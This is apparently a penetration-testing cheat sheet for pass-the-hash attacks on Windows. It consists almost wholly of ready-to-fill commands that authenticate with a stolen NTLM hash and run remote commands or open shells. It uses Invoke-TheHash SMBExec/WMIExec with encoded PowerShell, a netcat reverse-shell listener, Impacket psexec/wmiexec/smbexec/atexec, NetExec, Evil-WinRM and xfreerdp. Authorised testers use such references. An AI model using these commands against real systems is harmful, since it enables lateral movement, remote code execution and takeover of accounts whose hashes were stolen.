PRIMARY CATEGORY → NTLM
Passing the Hash
Invoke-TheHash
Reverse Shell
- Import the PowerShell Module
Import-Module .\Invoke-TheHash.psm1
- Set a Listening Port using Netcat
rlwrap -CaR nc -nlvp 443
Invoke-SMBExec
Invoke-SMBExec -Target <TARGET> -Domain <DOMAIN> -Username <USERNAME> -Hash <NTLM_HASH> -Command "Powershell.exe -EncodedCommand <BASE64_COMMAND>"
Invoke-WMIExec
Invoke-WMIExec -Target <TARGET> -Domain <DOMAIN> -Username <USERNAME> -Hash <NTLM_HASH> -Command "Powershell.exe -EncodedCommand <BASE64_COMMAND>"
Impacket
PSExec.py
psexec.py -hashes :<NTLM_HASH> <DOMAIN>/<USERNAME>@<TARGET> <COMMAND> # Default Command → cmd.exe
WMIExec.py
wmiexec.py -hashes :<NTLM_HASH> <DOMAIN>/<USERNAME>@<TARGET> <COMMAND> # Default Command → Semi-Interactive Shell
SMBExec.py
smbexec.py -hashes :<NTLM_HASH> <DOMAIN>/<USERNAME>@<TARGET> <COMMAND>
ATExec.py
atexec.py -hashes :<NTLM_HASH> <DOMAIN>/<USERNAME>@<TARGET> <COMMAND>
Netexec
nxc smb <TARGET> --username '<USERNAME>' --hash <NTLM_HASH> -x <COMMAND>
Evil-WinRM
evil-winrm --user <USERNAME>@<DOMAIN_OR_WORKGROUP> --hash <NTLM_HASH> --ip <TARGET>
XFreeRDP
xfreerdp /u:<USERNAME> /pth:<NTLM_HASH> /v:<TARGET> /cert:ignore
Restricted Admin Mode

See here